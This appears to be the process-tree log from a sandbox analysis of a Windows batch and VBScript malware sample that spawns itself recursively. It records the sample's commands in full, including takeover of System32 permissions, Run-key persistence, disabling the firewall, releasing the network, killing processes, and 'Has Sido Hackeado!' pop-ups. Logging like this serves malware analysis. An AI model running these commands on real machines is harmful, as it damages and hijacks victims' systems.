C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Taskdl.bat4⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r5⤵
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f4⤵
-
C:\Windows\system32\reg.exereg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f4⤵
-
C:\Windows\system32\ipconfig.exeipconfig /release4⤵
- Gathers network information
-
C:\Windows\system32\taskkill.exetaskkill /im DiskPart /f4⤵
- Kills process with taskkill
-
C:\Windows\system32\attrib.exeattrib -r -a -s -h *.*4⤵
- Views/modifies file attributes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"4⤵
-
C:\Windows\system32\msg.exemsg * Virus Detectado4⤵
-
C:\Windows\system32\msg.exemsg * Virus Detectado4⤵
-
C:\Windows\system32\msg.exemsg * Has Sido Hackeado!4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"4⤵
-
C:\Windows\system32\notepad.exenotepad4⤵
-
C:\Windows\system32\calc.execalc4⤵
-
C:\Windows\explorer.exeexplorer.exe4⤵
-
C:\Windows\system32\mspaint.exemspaint.exe4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"4⤵
-
C:\Windows\system32\notepad.exenotepad4⤵
-
C:\Windows\system32\calc.execalc4⤵
-
C:\Windows\explorer.exeexplorer.exe4⤵
-
C:\Windows\system32\mspaint.exemspaint.exe4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"4⤵
-
C:\Windows\system32\notepad.exenotepad4⤵
-
C:\Windows\system32\calc.execalc4⤵
-
C:\Windows\explorer.exeexplorer.exe4⤵
-
C:\Windows\system32\mspaint.exemspaint.exe4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"4⤵
-
C:\Windows\system32\notepad.exenotepad3⤵
-
C:\Windows\system32\calc.execalc3⤵
-
C:\Windows\explorer.exeexplorer.exe3⤵
-
C:\Windows\system32\mspaint.exemspaint.exe3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Taskdl.bat4⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r5⤵
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f4⤵
-
C:\Windows\system32\reg.exereg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f4⤵
-
C:\Windows\system32\ipconfig.exeipconfig /release4⤵
- Gathers network information
-
C:\Windows\system32\taskkill.exetaskkill /im DiskPart /f4⤵
- Kills process with taskkill
-
C:\Windows\system32\attrib.exeattrib -r -a -s -h *.*4⤵
- Views/modifies file attributes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"4⤵
-
C:\Windows\system32\msg.exemsg * Virus Detectado4⤵
-
C:\Windows\system32\msg.exemsg * Virus Detectado4⤵
-
C:\Windows\system32\msg.exemsg * Has Sido Hackeado!4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd5⤵
-
C:\Windows\system32\notepad.exenotepad4⤵
-
C:\Windows\system32\calc.execalc4⤵
-
C:\Windows\explorer.exeexplorer.exe4⤵
-
C:\Windows\system32\mspaint.exemspaint.exe4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"4⤵
-
C:\Windows\system32\notepad.exenotepad4⤵
-
C:\Windows\system32\calc.execalc4⤵
-
C:\Windows\explorer.exeexplorer.exe4⤵
-
C:\Windows\system32\mspaint.exemspaint.exe4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"4⤵
-
C:\Windows\system32\notepad.exenotepad4⤵
-
C:\Windows\system32\calc.execalc4⤵
-
C:\Windows\explorer.exeexplorer.exe4⤵
-
C:\Windows\system32\mspaint.exemspaint.exe4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"4⤵
-
C:\Windows\system32\notepad.exenotepad3⤵
-
C:\Windows\system32\calc.execalc3⤵
-
C:\Windows\explorer.exeexplorer.exe3⤵
-
C:\Windows\system32\mspaint.exemspaint.exe3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd4⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off4⤵
- Modifies Windows Firewall
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Taskdl.bat4⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r5⤵
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f4⤵
-
C:\Windows\system32\reg.exereg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f4⤵
-
C:\Windows\system32\ipconfig.exeipconfig /release4⤵
- Gathers network information
-
C:\Windows\system32\taskkill.exetaskkill /im DiskPart /f4⤵
- Kills process with taskkill
-
C:\Windows\system32\attrib.exeattrib -r -a -s -h *.*4⤵
- Views/modifies file attributes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"4⤵
-
C:\Windows\system32\msg.exemsg * Virus Detectado4⤵
-
C:\Windows\system32\msg.exemsg * Virus Detectado4⤵
-
C:\Windows\system32\msg.exemsg * Has Sido Hackeado!4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"4⤵
-
C:\Windows\system32\notepad.exenotepad4⤵
-
C:\Windows\system32\calc.execalc4⤵
-
C:\Windows\explorer.exeexplorer.exe4⤵
-
C:\Windows\system32\mspaint.exemspaint.exe4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"4⤵
-
C:\Windows\system32\notepad.exenotepad4⤵
-
C:\Windows\system32\calc.execalc4⤵
-
C:\Windows\explorer.exeexplorer.exe4⤵
-
C:\Windows\system32\mspaint.exemspaint.exe4⤵
-
C:\Windows\system32\notepad.exenotepad3⤵
-
C:\Windows\system32\calc.execalc3⤵
-
C:\Windows\explorer.exeexplorer.exe3⤵
-
C:\Windows\system32\mspaint.exemspaint.exe3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"3⤵
-
C:\Windows\system32\notepad.exenotepad2⤵
-
C:\Windows\system32\calc.execalc2⤵
- Modifies registry class
-
C:\Windows\explorer.exeexplorer.exe2⤵
- Modifies registry class
-
C:\Windows\system32\mspaint.exemspaint.exe2⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"2⤵
- Checks computer location settings
- Drops autorun.inf file
- Drops file in System32 directory
- Modifies registry class
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Taskdl.bat3⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r4⤵
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f3⤵
-
C:\Windows\system32\reg.exereg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f3⤵
-
C:\Windows\system32\ipconfig.exeipconfig /release3⤵
- Gathers network information
-
C:\Windows\system32\taskkill.exetaskkill /im DiskPart /f3⤵
- Kills process with taskkill
-
C:\Windows\system32\attrib.exeattrib -r -a -s -h *.*3⤵
- Views/modifies file attributes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"3⤵
-
C:\Windows\system32\msg.exemsg * Virus Detectado3⤵
-
C:\Windows\system32\msg.exemsg * Virus Detectado3⤵
-
C:\Windows\system32\msg.exemsg * Has Sido Hackeado!3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd4⤵
-
C:\Windows\system32\reg.exeREG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Twain_20 /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\Twain_20.cmd"5⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Taskdl.bat4⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r5⤵
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f4⤵
-
C:\Windows\system32\reg.exereg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f4⤵
-
C:\Windows\system32\ipconfig.exeipconfig /release4⤵
- Gathers network information
-
C:\Windows\system32\taskkill.exetaskkill /im DiskPart /f4⤵
- Kills process with taskkill
-
C:\Windows\system32\attrib.exeattrib -r -a -s -h *.*4⤵
- Views/modifies file attributes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"4⤵
-
C:\Windows\system32\msg.exemsg * Virus Detectado4⤵
-
C:\Windows\system32\msg.exemsg * Virus Detectado4⤵
-
C:\Windows\system32\msg.exemsg * Has Sido Hackeado!4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"4⤵
-
C:\Windows\system32\notepad.exenotepad4⤵
-
C:\Windows\system32\calc.execalc4⤵
-
C:\Windows\explorer.exeexplorer.exe4⤵
-
C:\Windows\system32\mspaint.exemspaint.exe4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"4⤵
-
C:\Windows\system32\notepad.exenotepad4⤵
-
C:\Windows\system32\notepad.exenotepad3⤵
-
C:\Windows\system32\calc.execalc3⤵
-
C:\Windows\explorer.exeexplorer.exe3⤵
-
C:\Windows\system32\mspaint.exemspaint.exe3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd4⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off4⤵
- Modifies Windows Firewall
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Taskdl.bat4⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r5⤵
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f4⤵
-
C:\Windows\system32\reg.exereg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f4⤵
-
C:\Windows\system32\ipconfig.exeipconfig /release4⤵
- Gathers network information
-
C:\Windows\system32\taskkill.exetaskkill /im DiskPart /f4⤵
- Kills process with taskkill
-
C:\Windows\system32\attrib.exeattrib -r -a -s -h *.*4⤵
- Views/modifies file attributes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"4⤵
-
C:\Windows\system32\msg.exemsg * Virus Detectado4⤵
-
C:\Windows\system32\msg.exemsg * Virus Detectado4⤵
-
C:\Windows\system32\msg.exemsg * Has Sido Hackeado!4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd5⤵
-
C:\Windows\system32\reg.exeREG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Twain_20 /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\Twain_20.cmd"6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd5⤵
-
C:\Windows\system32\reg.exeREG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Twain_20 /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\Twain_20.cmd"6⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Taskdl.bat5⤵
-
C:\Windows\system32\reg.exereg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f5⤵
-
C:\Windows\system32\reg.exereg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f5⤵
-
C:\Windows\system32\notepad.exenotepad4⤵
-
C:\Windows\system32\calc.execalc4⤵
-
C:\Windows\explorer.exeexplorer.exe4⤵
-
C:\Windows\system32\mspaint.exemspaint.exe4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"4⤵
-
C:\Windows\system32\notepad.exenotepad4⤵
-
C:\Windows\system32\calc.execalc4⤵
-
C:\Windows\explorer.exeexplorer.exe4⤵
-
C:\Windows\system32\mspaint.exemspaint.exe4⤵
-
C:\Windows\system32\notepad.exenotepad3⤵
-
C:\Windows\system32\calc.execalc3⤵
-
C:\Windows\explorer.exeexplorer.exe3⤵
-
C:\Windows\system32\mspaint.exemspaint.exe3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd4⤵
-
C:\Windows\system32\reg.exeREG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Twain_20 /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\Twain_20.cmd"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Taskdl.bat4⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r5⤵
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f4⤵
-
C:\Windows\system32\reg.exereg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f4⤵
-
C:\Windows\system32\ipconfig.exeipconfig /release4⤵
- Gathers network information
-
C:\Windows\system32\taskkill.exetaskkill /im DiskPart /f4⤵
- Kills process with taskkill
-
C:\Windows\system32\attrib.exeattrib -r -a -s -h *.*4⤵
- Views/modifies file attributes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"4⤵
-
C:\Windows\system32\msg.exemsg * Virus Detectado4⤵
-
C:\Windows\system32\msg.exemsg * Virus Detectado4⤵
-
C:\Windows\system32\msg.exemsg * Has Sido Hackeado!4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"4⤵
-
C:\Windows\system32\notepad.exenotepad4⤵
-
